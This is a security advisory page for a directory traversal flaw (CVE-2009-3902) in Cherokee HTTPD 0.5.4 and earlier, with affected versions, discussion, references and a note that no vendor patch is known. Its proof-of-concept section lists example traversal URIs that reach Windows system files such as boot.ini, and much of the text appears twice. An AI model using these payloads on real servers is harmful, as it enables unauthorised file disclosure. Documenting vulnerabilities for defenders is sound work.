Cherokee Directory Traversal Vulnerability
BID:36874
Info
Cherokee Directory Traversal Vulnerability
| Bugtraq ID: | 36874 |
| Class: | Input Validation Error |
| CVE: |
CVE-2009-3902 |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 28 2009 12:00AM |
| Updated: | Apr 13 2015 09:06PM |
| Credit: | Dr_IDE |
| Vulnerable: |
Cherokee-Project Cherokee HTTPD 0.5.1 Cherokee-Project Cherokee HTTPD 0.5 Cherokee-Project Cherokee HTTPD 0.4.17 Cherokee-Project Cherokee HTTPD 0.4.9 Cherokee-Project Cherokee HTTPD 0.4.8 Cherokee-Project Cherokee HTTPD 0.4.7 Cherokee-Project Cherokee HTTPD 0.4.6 Cherokee-Project Cherokee HTTPD 0.2.7 Cherokee-Project Cherokee HTTPD 0.2.6 Cherokee-Project Cherokee HTTPD 0.2.5 Cherokee-Project Cherokee HTTPD 0.2 Cherokee-Project Cherokee HTTPD 0.1.6 Cherokee-Project Cherokee HTTPD 0.1.5 Cherokee-Project Cherokee HTTPD 0.1 Cherokee-Project Cherokee 0.5.4 |
| Not Vulnerable: | |
Discussion
Cherokee Directory Traversal Vulnerability
Cherokee is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Cherokee 0.5.4 and prior versions are vulnerable.
Cherokee is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input data.
Exploiting the issue may allow an attacker to obtain sensitive information that could aid in further attacks.
Cherokee 0.5.4 and prior versions are vulnerable.
Exploit / POC
Cherokee Directory Traversal Vulnerability
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/\../\../\../boot.ini
http://www.example.com/\../\../\../WINDOWS\SYSTEM32
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
Attackers can exploit this issue via a browser.
The following example URIs are available:
http://www.example.com/\../\../\../boot.ini
http://www.example.com/\../\../\../WINDOWS\SYSTEM32
http://www.example.com/\../\../\../WINDOWS\SYSTEM32\calc.exe
Solution / Fix
Cherokee Directory Traversal Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
Cherokee Directory Traversal Vulnerability
References:
References:
- Cherokee Homepage (Cherokee)
- Cherokee Web Server <= 0.5.4 Directory Traversal Exploit (Dr_IDE)